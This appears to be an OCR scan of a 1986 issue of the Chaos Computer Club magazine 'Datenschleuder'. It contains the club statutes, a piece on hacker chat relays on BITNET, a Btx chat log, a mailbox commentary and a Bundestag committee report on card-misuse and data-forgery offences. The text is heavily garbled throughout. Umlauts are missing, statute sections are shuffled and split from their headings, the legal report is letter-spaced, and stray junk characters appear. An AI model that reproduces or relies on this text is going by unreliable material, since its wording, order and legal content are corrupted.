untersttzend tlig wird; in den Beirat knnen auch Nicht-Mitglieder berufen werden.

1 Name, Sitz, Geschftsjahr


(1) Der Verein fhrt den Namen "Chaos Computer Club". Der Verein wird in das Vereinsregister eingetragen und dann um den Zusatz "e.V." ergnzt. Der verein hat seinen Sitz in Hamburg. (2) Das Geschftsjahr beginnt am 1. Mrz jeden Kalenderjahres. (1) Der Club frdert und untersttzt Vorhaben der Forschung. Wissenschaft & Bildung, Erziehung, Kunst & Kultur, sowie der Vlkerverstndigung im Sinne der Prambel oder fhrt diese durch. Der Vereinszweck soll unter anderem durch folgende Mittel erreicht werden: 1. regelmige ffentliche Treffen und Informationsveranstaltungen 2. Veranstaltung und/oder Frderung internationaler Congresse, Treffen, sowie Telekonferenzen 3. Herausgabe der Zeitschrift "Datenschleuder 4. ffentlichkeitsarbeit und Talepublishing in allen Medien 5. Arbeits- und Erfahrungsaustauschkreise 6. Informationsaustausch mit den in der Datenschutzgesetzgebung vorgesehenen Kontrollorganen 7. Hacken 8. Hilfestellung und Beratung bei technischen und rechtlichen Fragen im Rahmen der gesetzlichen Mglichkeiten fr die Mitglieder (2) Der Club ist gemeinntzig; er dient ausschlielich und unmittelbar der Volksbildung zum Nutzen der Allgemeinheit. Er darf keine Gewinne erzielen; er ist selbstlos ttig und verfolgt nicht in erster Linie eigenwirtschaftllche Zwecke. Die Mittel des Club werden ausschlie lich und unmitteibarzu den satzungsgemen Zwecken verwendet. Die Mitglieder erhalten keine Zuwendung aus den Mitteln des Clubs. Niemand darf durch Ausgaben, die dem Zwecke des Clubs fremd sind oder durch unverhltnismig hohe Vergtungen begnstigt werden.

2 Zweck und Gemeinntzigkeit

Vorstand. Die Mitgliedschaft beginnt mit der Annahme der Beitrittserklrung. (3) Die Mitgliedschaft endet durch Austrittserklrung. durch Tod von natrlichen Personen oder durch Auflsung und Erlschen von juristischen Personen, Handelsgesellschaften, nicht rechtsf j higen Vereinen sowie Anstalten und Krperschaften des ffentlichen Rechtes oder durch Ausschlu; die Beitragspflicht fr das laufende Geschftsjahr bleibt hiervon unberhrt. (4) Der Austritt ist nur zum Schlu eines Geschftsjahres zulssig; die Austrittserklrung mu sptestens drei Monate vor Ablauf des Geschftsjahres gegenber dem Vorstand schriftlich abgegeben werden. (5) Die Mitgliederversammlung kann solche Personen, die sich besondere Verdienste um den Club oder um die von ihm verfolgten satzungsgemen Zwecke erworben haben, zu Ehrenmitgliedern ernennen. Ehrenmitgliederhaben alle Rechte eines ordentlichen Mitglieds. Sie sind von Beitragsleistungen befreit.

10 Finanzprfer
(1) Zur Kontrolle der Haushaltsfhrung bestellt die Mitgliederversammlung Finanzprfer. Nach Durchfhrung ihrer Prfung geben sie dem Vorstand Kenntnis von ihrem Prfungser gebnis und erstatten der Mitgliederversammlung Bericht. (2) Die Finanzprfer drfen dem Vorstand nicht angehren. (1) Der Club bildet zur Durchfhrung seiner Aufgaben regionale Ertahrungsaustauschkreise (Erfa-Kreise). Sie bestimmen ihre Organisationsstruktur selbst. (2) Aufgabe der Erfa-Kreise ist ferner, 1. die Entscheidungsbildung im Club zu frdern und vorzubereiten, 2. Mitglieder fr den Club zu werben. (3) Beabsichtigt ein Eria-Kreis, bestimmte Themen oder Aktivitten mit berregionalen Bezug an die ffentlichkeil zu tragen, ist dies vorher mit dem Vorstand des Clubs abzustimmen. (4) Jeder Erfa-Kreis bestimmt einen Erfa-KreisVertreter. Die Erfa-Kreise sollten sich eine Organisationsstruktur geben, die mit dem Erta-Beirat abzustimmen ist.

11 Erfa-Organlsatlon

4 Rechte und Pflichten der Mitglieder


(1) Die Mitglieder sind berchtigt, die Leistungen des Clubs in Anspruch zu nehmen. (2) Die Mitglieder sind verpflichtet, die satzungsgemen Zwecke des Club zu untersttzen und zu frdern. Sie sind verpflichtet, die festgesetzten Beitrge zu zahlen. (1) Ein Mitglied kann durch Beschlu des Vorstandes ausgeschlossen werden, wenn es das Ansehen des Clubs schdigt, seinen Beitragsverpflichtungen nicht nachkommt oder wenn ein sonstiger wichtiger Grund vorliegt. Der Vorstand mu dem auszuschlieenden Mitglied den Beschlu in schriftlicher Form unter Angabe von Grnden mitteilen und ihm auf Verlangen eine Anhrung gewhren. (2) Gegen den Beschlu des Vorstandes Ist die Anrufung der Mitgliederversammlung zulssig. Bis zum Beschlu der Mitgliederversammlung ruht die Mitgliedschaft.

5 Ausschlu eines Mitgliedes

12 Erfa-Beirat
(1) Der Erfa-Beirat besteht aus den ErfaVertretern, die Clubmitglieder sind. (2) Der Erfa-Beirat schlgt der Mitgliederversammlung aus seiner Mitte den ErfaReprsentanlen zur Wahl in den Vorstand vor. (3) Der Erfa-Beirat wirkt bei der Fhrung der Clubgeschfte beratend und untersttzend mit. Er hat dabei insbesondere die Aufgabe, die Belange der Erfa-Kreise zu vertreten.

(1) Ordentliche Clubmitglieder knnen natrliche und juristische Personen, Handelsgesellschaften, nicht rechtsfhige Vereine sowie Anstalten und Krperschaften des ffentlichen Rechts werden. (2) Die Beitrittserklrung erfolgt schriftlich oder fernschriftlich gegenber dem Vorstand. Uber die Annahme der Beitrittserklrung entscheidet der

3 Mitgliedschaft

13 Auflsung des Clubs


Bei der Auflsung des Clubs oder bei Wegfall seines Zweckes fllt das Clubvermgen an eine von der Mitgliederversammlung zu bestimmende Krperschaft des ffentlichen Rechts oder eine andere steuerbegnstigte Krperschaft zwecks

6 Beitrag
(1) Der Club erhebt einen Aufnahme- und Jahresbeitrag. Er ist bei der Aufnahme und fr das Geschftsjahr im ersten Quartal des Jahres im voraus zu entrichten. Das Nhere regelt eine Bei-

Verwendung fr die Volksbildung. Hamburg, den 16. Februar 1986

Club angesteil ten Mitarbeiter; er kann diese Aufgabe einem Vorstandsmitglied bertragen.

Bitnepp
"FQr Immer wurde der Betrieb des Relays an der Cornell Universitt in New York eingestellt"; so berichtete die dpa-Meldung vom .... Wir wissen nicht, wer ihnen diese freundliche Mitteilung berreicht hat, wir empfehlen 'SEND/REM CORNELLC RLY' (ehemals CORNELLC MAS). Angeblich haben esdie Hackerdoch geschafft, ber BITNET ganze Rechnernetze herunterzufahren und wichtige Dateien "unwissentlich vernichtet". Wilde Spekulationen ber Planungen "elektronischer Bombeneinschlge" wurden in den Pressemeldungen verlautbart. Die "Hackergefahr kann nach Ansicht der Cornell Uni nicht so gro gewesen sein, da das System bereits nach etwa drei Monaten unter geringfgig gendertem Namen wieder am Netz ning. Zu EARN/BITNET, um das es in diesem Zusammenhang geht einige sachliche Anmerkungen: Tatsache ist, da Dialoge auf EARN/BITNET (von IBM gesponsort) mittels Konferenzprotokollen stndig berwacht werden knnen und auch wurden. BITNET verbindet nahezu smtliche Universitten und Forschungszentren in den USA und Europa (ber EARN = European Academic Research Network) und bietet JEDEM Benutzer der Rechner die Mglichkeit, Dateien mit JEDEM Benutzer desselben oder eines anderen Rechners bers Netz auszutauschen. Zur Frderung der Kommunikation wurde ein sog. "Interchat Relay Network" eingefhrt, das online Konferenzschaltungen erlaubt. So haben sich zum Beispiel die Wissenschaftier, die die Giotto-Sonde zur Erforschung des Kometen Hailey berwachten in der Zeit, in der sie nur darauf warteten, da irgendetwas schiefgeht die Langeweile bei einem lockeren Chat vertrieben. Eben auf diesen "Relays" haben sich auch deutsche und Schweizer Hacker etabliert, um an den Gesprchen konstruktiv teilzunehmen. Es Ist also wie gesagt nicht mglich, auf fremden Rechnern Dateien zu lschen oder gar Betriebssystemkommandos auszufhren, d.h. die dpa-Pressemeldung lieferte einfach irrefhrende Informationen. Doch zurck zu BITNET/EARN: Der Schweizer Zentralknoten CEARN (Genf) ist mit Darmstadt, Paris, Rutherford, Rom und Stockholm direkt verbunden und fhrt via diese Knoten theoretisch direkt in die USA, z.B. an die George Washington University in New York, praktisch klappt die Verbindung nicht immer reibungslos (Murphy schlug bereits diverse Male zu). A n EARN hngen z.B. (fast) alle deutschen Unis, das DESY in Hamburg, das DFVLR in Mnchen, Cern in der Schweiz und einige NASA Rechner. Fr Ottonormalforscher sind derartige interessante Perspektiven vllig verschlossen, Heinz Hacker wird von Netzbetreibern immer noch ungern gesehen ("Fritz is online"). EARN/BITNET ist fr jeden eine sehr interessante Sache, denn neben lockeren Chats findet speziell in den Konferenzen ein reger Know-How-Austausch statt, ber letzteres verfgen Hacker unbestritten ! Nebenbei: EARN wird von der 3-BuchstabsnFirma bis Ende 1987 finanziert, so da es natrlich fr diverse Forschungsinstitute in Deutschland kein Problem ist, sich (via DatexL) daran zu beteiligen, zumindest solange es sich um SNA-(un)fhige Systeme handelt. Nicht erstab 1988gilt also fr IBM: "Let's EARN some moneyl", von der parasitren KnowHow-Beschaffung ganz abgesehen. Warum eigentlich den Hackern, den wahren Verfechtern der freien Kommunikation der Zugriff verweigert werden soll, ist nicht einzusehen, denn unbestritten bleibt doch der Forschungsauftrag der Hacker, der eine Teilnahme an diesem Netz geradezu zwingend vorschreibt I Zum Schlu noch ein paar Tips fr jene Datenreisenden, die ber einen EARN oder BITNET Zugang verfgen: Auf VAXen: SEND/REM CEARN RELAY in Europa oder SEND/REM BITNIC RELAY in USA, um an den Konferenzen teilzunehmen, dann /h fr Help. Auf IBM/VM Kisten: TELL RELAY AT CEARN /h usw.l Empfehlenswert: das Relay an der Cornell-Uni sollte bevorzugt behandelt werden (CORNELLC RLY), ist aber nur zwischen 9:00 pm und 6:00 am lokaler Zeit erreichbar. Aber keine elektronischen Bombeneinschlge planen oder gar Giotto auf dem Mars landen lassen, sonst wird die Cornell-Uni keine weiteren Studienbewerbungen mehr annehmen. FRIMP & VIC, (the Networker Crew)

Mailboxen im Btx-Wartesaal
ber externe Rechner wurde In Bildschirmtext eine Dlalogmgllchkelt geschaffen. Einen guten Eindruck gibt der folgende Dialogmitschnitt; die Btx-blichen Verwaltungs- und Farbinformationen wurden gestrichen. Teilnehmer waren hallo und chaos-team 001: Dialog-Beginn 14:55:25 hallo aus HH hallo aus hh, hier ist das chaos-team. und welche Mission treibt euch hierher? wir testen die Wartezeiten (abgeschickt 14:58:22; angezeigt wurde durch Ubermittlungsfehler "Eilgabe abgeschickt" statt "Eingabe abgeschickt". Die Antwort traf um 15:01:03 ein.) na dann viel Spa. Testet mal auch, wie oft man hier rausfliegt. Ich wurde heute schon 6 mal hinausbefrdert, aber das glauben die Veranstalter mir nicht. da ist der msg dienst im postsystem schneller und bald wohl auch preiswerter ganz sicher, aber nicht das Angebot wie endet der dialog, wenn du nicht mehr da bist (rausfliegst) fr uns, merkt das system das? mein Partner sendet noch eine Mitt. ab, die nicht ankommt, ich erhalte eine Postseite mit: die Verbindung wurde unterbrochen aus technischen Grnden. ist bekannt, welche gebhren geplant sind? ich wei nur das, was am Anfang gesagt wird. 0,08 pro Dialogschritt und 0,50 fr den Einstieg. 0,07 kostet eine versendete msg ber mailboxsysteme, der dialog dort in echtzeit 25 pfg die minute - welchen namen hat die systemzentrale? wei nicht, aber da sind meistens Beobachter im Programm unter ICR, Baff oder eine Kombination davon. danke, drfen wir diesen dialog verffentlichen? gerne, wenn er aussagekrftig genug ist ok, wie beendet man den dialog? die nchste msg nicht absenden Um 15:22:14 konnten wir den zweiten und vorerst letzten Dialog beginnen. Ein Testlesen des Artikels dauerte xx Sekunden; per Btx ca. 20 Minuten.
/xWs/btanbx16.wau 860401 19t1

Glaube an neue Dienste Btx-Schwund statt Schwung bringt die neue Gebhrenordnung. Zum Rckgang der Anbieterzahlen meinte der Leiter des Fernmeldeamtes in N. (Q:sz860701s26): "Man mu an neue Dienste glauben..."

"...aber in den Zentren keimt es. Einige Sysops gestalten ihre rmationssysteme bewuat, sie agieren als elektronische Verleger." So stand es in DS14 in der Ankndigung des Chaos Communication Congress '85. Den lokalen Mailboxen wurde steigende Qualltat bescheinigt, das Bewusstsein der Betreiber fr die Erfordernisse der Kommunikationsgesellschaft sei gestiegen. Tatsachlich gibt es uberall in diesem unseren Lande Sysops, fr die ihre Mailbox mehr ist, als nur eine elektronische Mullhalde. Diese Betreiber investieren sehr viel Zeit und noch mehr Geld in die Entwicklung der lokalen Systeme, u m eine Angleichung an den Standard der kommerziellen Boxen zu erreichen, ja diesen Standard in der Hinsicht zu bertreffen, daa sie dem alten Grundsatz treu bleiben "Soviel Information wie mglich, so preiswert wie mglich". Dawerden mal eben 10.000 DM in Hardware gesteckt, hunderte von Arbeitsstunden In Programmentwicklung investiert. Treibende Kraft bei dieser Entwicklung war dabei auch der CCC, der immerwieder unablaaig forderte, die lokalen Systeme muaten weg von der CB-Mullbox, hin zum (semi-) professionellen Standard. Urdtatsachlich fielen diese Anregungen bei etlichen Betreibern auf fruchtbaren Boden, inzwischen entstehen bundesweit uberall Systeme, die auf mehreren Leitungen gleichzeitig erreichbar sind, teilweise auch ber Pattex-D. Das Hauptproblem fr die Betreiber dieser Systeme ist dabei, d e m Otto-Normal-User klarzumachen, daadiese qualitativ hochwertigen regionalen Systeme nicht mehr kostenlos zuganglich sein knnen, wenn allein die Fernmeldegebuhren bis zu 400.- DM pro Monat betragen. Das ist angesichts der unzahligen C64-Boxen, die zum Nulltarif a m Netz hangen, schon ein schwieriges Unterfangen, das nur durch die erhebliche Leistungssteigerung gegenber den herkmmlichen Systemen sinnvoll und damit machbar wird. Nicht zu vergessen, daa die neuen regionalen und uberregionalen Boxen auch ein gutes Stuck mehr an informationeller Selbstbestimmung bieten, denn es stecken ja immer noch dieselben Leute dahinter, die im besten Sinne chaotischer Tradition agieren. In diese sehr schwierige Situation hinein platzt nun die Ankndigung des CCC, seinen Mitgliedern die Mglichkeit zu geben, ein kommerzielles Mailboxsystem fr einen unglaublich gunstigen Preis zu nutzen. Das Ist auf den ersten Blick eine sensationelle Sache, denn bisher waren kommerzielle Boxen aufgrund der hohen Monatsgebuhren fr normale Sterbliche unerreichbar. Auf den zweiten Blick jedoch ereben sich daraus harte Konsequenzen fr diejenigen ysops, die erade dabei sind, ihre Systeme, wie oben beschrieben, auszubauen, denn angesichts der neuesten Entwicklung erscheint es zunchst sinnlos, die Projekte weiterzufuhren. Wozu ein System errichten, dass d e m Benutzer fr fnf Mark im Monat ein Subset der Leistungen kommerzieller Boxen bietet, wenn fr relativ geringe Mehrkosten der Zugang zu den kommerziellen Systemen offen ist? Zwar ist dafr die Mitgliedschaft im CCC notwendig, was bei den normalen Boxen nicht der Fall ist, aber es steht zu befurchten, daa es blich wird, CCC-Mitglied zu werden, u m in den Genuss der kommerziellen Box zu kommen. Diese Entwicklung kann .durchaus dazu fuhren, daa die augenblicklichen Versuche, eine autonome Informationsszene hohen Standards auzubauen, im Keime erstickt, oder zumindest auf lange Sicht behindert werden und es stellt sich die Frage, ob das tatsachlich im Sinne des Chaos Computer Clubs ist. Mrivuie.di 66050? 2 2 goblin 00

CCC auf kommerziellen Boxen - Rckschlag fr private Betreiber ?

ilzLd

I ^ C D -

Z u Artikel 1 N r . 5 2 8 8 a S t G B

recht
' -=-i S sl-S

N e b e n einer r e d a k t i o n e l l e n K l a r s t e l l u n g h a t d e r A u s s c h u die b e r s c h r i f t e r w e i t e r t D a d u r c h soll vor a l l e m d i e u n t e r s c h i e d l i c h e S c h u t z r i c h t u n g zwischen Abs. 1 u n d Abs. 2 n o c h s t r k e r v e r d e u t l i c h t w e r d e n . W h r e n d A b s a t z 2, w i e sich s c h o n a u s d e r F a s s u n g ergibt, ein u n t r e u e h n l i c h e s V e r h a l t e n des Arbeitgebers ( u n d der i h m d u r c h 14 S t G B gleichgestellten Personen) z u m N a c h t e i l d e s A r b e i t n e h m e r s erfassen will, h a n d e l t es sich bei A b s i t z 1 ( u n d h n l i c h bei Absatz 3) u m den S c h u t z d e r Solidargemeinschaft. D a s A u f k o m m e n d e r Sozialversicherungstrger u n d der B u n d e s a n s t a l t f r A r b e i t soll d a d u r c h strafrechtlich g e w h r l e i s t e t w e r d e n . D i e s ist in Absatz 1 d u r c h d i e S t r e i c h u n g e i n g r e n z e n d e r M e r k m a l e des geltenden R e c h t s (erhalten", einbehalten") verdeutlicht w o r d e n , w o d u r c h sich A b s a t z 1 bewut von Absatz 2 unterscheidet D a m i t k n n e n k n f t i g a u c h Flle b e s t r a f t w e r d e n , in d e n e n Arbeitgeber u n d A r b e i t n e h m e r e i n v e r n e h m l i c h verabreden, bei L o h n z a h l u n g e n k e i n e B e i t r g e a b z u f h r e n ( z u m bisherigen R e c h t vgl. B G H w i s t r a 1B82, 111). D a sich dies a u s d e m W o r t l a u t d e r E n t w r f e bereits ergibt, ist eine zustzliche E r g n z u n g d e s Textes, wie dies v o n d e m S a c h v e r s t n d i g e n S t a h l s c h m i d t in der ffentlichen A n h r u n g e r w o g e n w u r d e (vgl. P r o t Nr. 28, Anl. S. 8), n i c h t erforderlich. A u c h u n t e r Bercksichtigung der i m W i r t s c h a f t s a u s s c h u geuerten K r i t i k an 2 8 8 a S t G B ist d e r A u s s c h u der M e i n u n g , da die A u f b r i n g u n g d e r M i t t e l d e r S o z i a l v e r s i c h e r u n g ebenso w i e die des Steueraufkommens eines besonderen strafrechtlichen Schutzes bedarf. D a v o n geht schon d a s g e l t e n d e R e c h t aus.

D u r c h d i e n e u e S t r a f v o r s c h r i f t soll der F a l l erfat w e r d e n , d a ein Scheck- oder K r e d i t k a r t e n n e h m e r u n t e r V e r w e n d u n g der K a r t e W a r e n k a u f t u n d D i e n s t l e i s t u n g e n in A n s p r u c h n i m m t , o b w o h l er wei, d a d a s K r e d i t i n s t i t u t seine R e c h n u n g e n z u b e z a h l e n hat, u n d er selbst aber, z. B. n a c h e i n e m V e r m g e n s v e r f a l l n i c h t m e h r i n der L a g e sein wird, die A u s l a g e n z u r c k z u e r s t a t t e n . B e s t r a f t w e r d e n soll die d a d u r c h v e r u r s a c h t e V e r m g e n s s c h d i g u n g der K r e d i t i n s t i t u t e . Der B u n d e s g e r i c h t s h o f h a t in e i n e m Urteil v o m 13. J u n i 1985, 4 S t R 213/85 ( B G H S t 33, 244) z u m Kred i t k a r t e n m i b r a u c h festgestellt, d a e i n e solche T a t h a n d l a n g n i c h t den T a t b e s t a n d d e r U n t r e u e u n d des B e t r u g s erflle. A l l e r d i n g s h a t der Bundesgerichtshof i n seiner E n t s c h e i d u n g v o m 13. J u n i 1085 u n t e r B e s t t i g u n g seiner E n t s c h e i d u n g v o m 26. J u l i 1972 ( B G H S t 24, 386) e n t s c h i e d e n , d a e i n Mibrauch der Scheckkarte durch den K a r t e n i n h a b e r den allgemeinen Betrugstatbestand n a c h 283 S t G B erflle. E r h a t h i e r b e i d a r a u f abgestellt, d a die S c h e c k k a r t e i m S c h e c k v e r k e h r v o r g e l e g t w e r d e u n d n u r d e n z u s t z l i c h e n N a c h w e i s der Einlsegar a n t i e erbringe, w h r e n d d i e e i g e n t l i c h e H a n d l u n g m i t E r k l r u n g s w e r t d i e H i n g a b e d e s S c h e c k s sei. I n s o w e i t bestehe kein w e s e n s m i g e r U n t e r s c h i e d zu der E i n l s u n g eines u n g e d e c k t e n S c h e c k s o h n e S c h e c k k a r t e . Diese R e c h t s p r e c h u n g des Bundesgerichtshofs w i r d v o m S c h r i f t t u m bis h e u t e m i t der B e g r n d u n g heftig kritisiert, d a sie m i t d e n Gegeb e n h e i t e n des S c h e c k k a r t e n v e r k e h r s n i c h t i m Eink l a n g sei. W i e bei der V o r l a g e e i n e r K r e d i t k a r t e b r a u c h e d e r S c h e c k n e h m e r sich bei d e r V o r l a g e d e r S c h e c k k a r t e bis zur g a r a n t i e r t e n S u m m e b e r d i e K r e d i t w r d i g k e i t des S c h e c k a u s s t e l l e r s k e i n e Ged a n k e n z u m a c h e n u n d w e r d e das in d e r R e g e l a u c h n i c h t t u n . D i e V o r a u s s e t z u n g e n des Betrugstatbestands, n m l i c h der f r die V e r m g e n s v e r f g u n g e n urschliche Irrtum, sind deshalb In diesen Fllen nicht gegeben. Angesicht dieser K r i t i k aus d e m S c h r i f t t u m ist d a v o n a u s z u g e h e n , d a d i e Entscheid u n g es Bundesgerichtshofs auf D a u e r schwerlich B e s t a n d h a b e n werde. I m R e c h t s a u s s c h u ist u m s t r i t t e n , o b d e r dargestellte M i b r a u c h v o n Scheck- u n d K r e d i t k a r t e n strafwrdig i s t N a c h A u f f a s s u n g der M e h r h e i t weist die dargestellte T a t h a n d l u n g gegenber dem g e l t e n d e n U n t r e u e t a t b e s t a n d e i n e n h n l i c h e n sozialschdlichen Kriminalitatsgehalt auf. D e r neue S t r a f t a t b e s t a n d sei z u m S c h u t z e d e r F u n k t i o n s f higkeit des bargeldlosen Zahlungsverkehrs, der eine volkswirtschaftliche B e d e u t u n g erlangt habe, notwendig. D i e M i n d e r h e i t l e h n t d i e n e u e S t r a f v o r s c h r i f t ab. Sie ist d e r A u f f a s s u n g , d a die V e r w e n d u n g d e r Scheck-, v o r a l l e m der K r e d i t k a r t e n , a l l g e m e i n keineswegs so positiv e i n z u s c h t z e n sei. d a d a s Kreditu n d S c h e c k k a r t e n s y s t e m d i e G e f a h r e i n e r bers c h u l d u n g d e r I n h a b e r i n sich berge, w i e es sich i n d e n U S A gezeigt habe. Vor a l l e m w r d e m i t d e m S t r a f t a t b e s t a n d i n s y s t e m w i d r i g e r W e i s e d i e Verletz u n g v o n V e r t r a g s p f l i c h t e n strafrechtlich sanktion i e r t u n d d e r n o t w e n d i g e R e c h t s s c h u t z sei d u r c h d a s Z i v i l r e c h t g e w h r l e i s t e t I n s b e s o n d e r e sei es A u f g a b e d e r K r e d i t i n s t i t u t e , sich d u r c h e i n e entsprechende Ausgestaltung der Rechtsbeziehungen z u den I n h a b e r n d e r S c h e c k k a r t e n u n d K r e d i t k a r t e n u n d z u d e n V e r t r a g s f i r m e n sowie d u r c h e i n e sorgfltige P r f u n g der Kreditwrdigkeit ihrer K u n d e n z u schtzen.

E i n i g k e i t bestand i m A u s s c h u , da k e i n e Notwendigkeit b e s t e h t d e n T a t b e s t a n d auf a n d e r e F l l e von M i b r u c h e n , insbesondere auf d e n G e b r a u c h von Scheck- u n d K r e d i t k a r t e n d u r c h Nichtberechtigte a u s z u d e h n e n . D i e A n w e n d u n g des Betrugstatbestandes reicht hier aus. Z u der A u s g e s t a l t u n g der v o n der M e h r h e i t beschlossenen Strafvorschrift ist z u b e m e r k e n : Absatz 1 l e h n t sich in seiner E i n z e l a u s g e s t a l t u n g e n g an d e n M i b r a u c h s t a t b e s t a n d des 266 S t G B (Untreue) an. D u r c h die W e n d u n g . . . d i e i h m d u r c h die b e r l a s s u n g einer S c h e c k k a r t e oder e i n e r Kreditkarte e i n g e r u m t e M g l i c h k e i t , d e n Aussteller zu einer Z a h l u n g zu v e r a n l a s s e n " w i r d d e r Tterkreis a u f berechtigte K a r t e n i n h a b e r e i n g e g r e n z t u n d a u c h die G a r a n t i e e r k l r u n g , die m i t der berlassung d e r K a r t e v e r b u n d e n ist, beschrieben. Zahlung ist d a b e i ' n i c h t n u r i m rein technischen S i n n e als H i n g a b e von B a r g e l d zu verstehen, sondern a u c h als G e l d l e i s t u n g i m V e r r e c h n u n g s w e g e . Die Begriffe Scheck- u n d K r e d i t k a r t e h a b e n i m Wirtschaftsleben e i n e n so feststehenden Bedeutungsinhalt, da sie als T a t b e s t a n d s m e r k m a l e a u s r e i c h e n d b e s t i m m t sind, z u m a l a u f d i e i h n e n notwendigerweise z u k o m m e n d e G a r a n t i e f u n k t i o n B e z u g gen o m m e n wird. Die m i t der b e r l a s s u n g der Scheck- o d e r Kreditkarte e i n g e r u m t e M g l i c h k e i t m u d e r T t e r mib r a u c h e n " . Das M i b r a u c h s m e r k m a l entspricht d e m des 266 Abs. 1 1. A l t e r n a t i v e S t G B . D e r T t e r h l t sich d a b e i n a c h auen i m R a h m e n seines rechtlichen K n n e n s , b e r s c h r e i t e t a b e r i m Innenv e r h l t n i s z u d e m K a r t e n h e r a u s g e b e r die G r e n z e n seines rechtlichen Drfens. M i b r a u c h der Scheckk a r t e liegt z. B. i m m e r d a n n vor, w e n n d e r T t e r e i n e n S c h e c k hingibt, dessen E i n l s u n g zwar v o n s e i n e m K r e d i t i n s t i t u t g a r a n t i e r t ist, f r d e n a u f sein e m K o n t o aber k e i n e D e c k u n g oder kein ausreic h e n d e r K r e d i t v o r h a n d e n i s t Bei der K r e d i t k a r t e liegt ein M i b r a u c h z. B. d a n n vor, w e n n d e r T t e r m i t der V e r w e n d u n g der K a r t e gegen seine a u s d e m K r e d i t k a r t e n v e r t r a g resultierenden Pflichten vers t t insbesondere, w e n n er V e r p f l i c h t u n g e n eing e h t obwohl die E i n k o m m e n s - u n d Vermgensverh l t n i s s e d e n K o n t o a u s g l e i c h nicht gestatten oder er selber n i c h t f r a u s r e i c h e n d e D e c k u n g S o r g e getragen h a t W i e bei 266 S t G B setzt d a s M i b r a u c h s m e r k m a l w e d e r generell voraus, d a d e m K a r t e n i n h a b e r f r e i n z e l n e G e s c h f t e ein L i m i t gesetzt ist (so i n sein e r W i r k u n g die S c h e c k k a r t e n g a r a n t i e ) , noch d a ein z e i t a b h n g i g e r (etwa m o n a t l i c h e r ) Hchstrahm e n vorgeschrieben wird, n o c h d a eine a b s o l u t e K r e d i t o b e r g r e n z e v e r e i n b a r t i s t A n d e r e n f a l l s wren V e r h a l t e n s w e i s e n , b e r d i e der Bundesgerichtshof j n g s t zu entscheiden hatte, w e i t e r h i n straflos. D e r M i b r a u c h der K r e d i t k a r t e m u schlielich z u einer S c h d i g u n g des Kartenherausgebers fhren. D a m i t soll d i e Parallele z u m Betrugs- u n d Untreuet a t b e s t a n d g e w a h r t Vierden, d a d u r c h d e n n e u e n T a t b e s t a n d lediglich eine L c k e geschlossen werden soll, d i e bei d e r A n w e n d u n g dieser B e s t i m m u n gen o f f e n b a r w u r d e . E s m u sich d a h e r bei d e m Schaden u m einen Vermgensschaden handeln. Das Schadenserfordernis engt darber h i n a u s das

M i b r a u c h s m e r k m a l weiter ein. Ist der T t e r anderweitig bereit u n d i n der L a g e , die b e r z i e h u n g sofort oder jedenfalls u n v e r z g l i c h a u s z u g l e i c h e n , so liegt ein S c h a d e n ebenso w i e b e i m Untreuetatbestand, der d e m neuen T a t b e s t a n d in d i e s e m P u n k t e n t s p r i c h t n i c h t vor. Unter diesen Vorauss e t z u n g e n w i r d auch der n e u e T a t b e s t a n d des S c h e c k k a r t e n m i b r a u c h s n i c h t a n z u w e n d e n sein, w e n n d e r Tter gelegentlich sein K o n t o d u r c h Beg e b u n g v o n Schecks ber d i e i h m e i n g e r u m t e Kreditgrenze hinaus belastet D e r Tter m u vorstzlich h a n d e l n , der Vorsatz m u sich a u f s m t l i c h e T a t b e s t a n d s m e r k m a l e beziehen. Derjenige, der bei S c h e c k aussteliung oder V e r w e n d u n g der K r e d i t k a r t e n o c h nicht wei, d a er s e i n e n Verpflichtungen s p t e r nicht w i r d nachk o m m e n knnen, k a n n daher auch nach dem neuen T a t b e s t a n d n i c h t bestraft w e r d e n . D a r b e r h i n a u s h a n d e l t a u c h derjenige u n t e r U m s t n d e n n o c h n i c h t vorstzlich, d e r z w a r v o n d e r Deckungslosigkeit seines K o n t o s bei B e g e b u n g des g a r a n t i e r t e n Schecks wei, aber m i t V e r m g e n s a u s g l e i c h in krzester Z e i t r e c h n e t Absau 2 e r k l r t entsprechend 266 A b s . 2 S t G B 2 4 8 a (Antragserfordernis bei g e r i n g e m S c h a d e n ) f r entsprechend a n w e n d b a r . Z u A r t i k e l 1 Nr. 6 269 S t G B F l s c h u n g beweiserheblicher Daten D i e E i n f h r u n g eines b e s o n d e r e n T a t b e s t a n d e s gegen die F l s c h u n g beweiserheblicher D a t e n w i r d v o m A u s s c h u f r n o t w e n d i g erachtet. D a f r s i n d d i e bereits i m R e g i e r u n g s e n t w u r f , i n der ffentlic h e n A n h r u n g sowie i n den A u s s c h u b e r a t u n g e n vorgebrachten Gesichtspunkte magebend. V o m T a t b e s t a n d der U r k u n d e n f l s c h u n g w e r d e n unbef u g t e E i n g a b e n z. B. von C o m p u t e r d a t e n b z w . unbef u g t e V e r n d e r u n g e n von bereits gespeicherten Daten, die, w e n n sie in ein S c h r i f t s t c k a u f g e n o m m e n w r e n , e i n e U r k u n d e n f l s c h u n g darstellen w r d e n , m a n g e l s E r k e n n b a r k e i t der E r k l r u n g n i c h t e r f a t F r die A n w e n d u n g des 267 S t G B reicht die leichte E i n s e h b a r k e i t in D a t e i e n b e r Bildschirmt e r m i n a l s alleine nicht aus. Di? U r k u n d e n e i g e n s c h a f t k a n n auch m a n g e l s A u s s t c D e r a n g a b e entfallen. S o l c h e n D a t e n fehlt d a h e r die v o n 2 6 7 S t G B vorausgesetzte U r k u n d e n q u a l i t t . Der Straftatbes t a n d des 268 S t G B ( F l s c h u n g technischer Aufz e i c h n u n g e n ) erfat n u r Teilbereiche. O h n e eine Erg n z u n g des Strafrechts w r d e d a h e r d i e Umstell u n g v e r w a l t u n g s m i g e n H a n d e l n s a u f d i e Datenv e r a r b e i t u n g d e n bisher bei S c h r i f t s t c k e n besteh e n d e n strafrechtlichen U r k u n d e n s c h u t 2 unger e c h t f e r t i g t v e r k r z e n . Bei d e n V e r w e n d u n g s m g l i c h k e i t e n d e r D a t e n v e r a r b e i t u n g reicht f r e i n e n w i r k s a m e n S c h u t z a u c h die T a t s a c h e n i c h t aus, d a V e r a r b e i t u n g e n zu- C o m p u t e r a u s d r u c k e n fhren k n n e n , d e n e n U r k u n d e n q u a l i t t b e i z u m e s s e n ist u n d d i e bei (mittelbarer) V o r n a h m e , z. B. von Eingab e n oder n a c h t r g l i c h e n V e r n d e r u n g e n durch n i c h t Berechtigte, d e s h a l b als U r k u n d e n f l s c h u n g i. S. v o n 267 S t G B qualifiziert w e r d e n k n n e n . I n vielen F l l e n w e r d e n e n t s c h e i d u n g s e r h e b l i c h e Daten direkt aus dem Computer zur 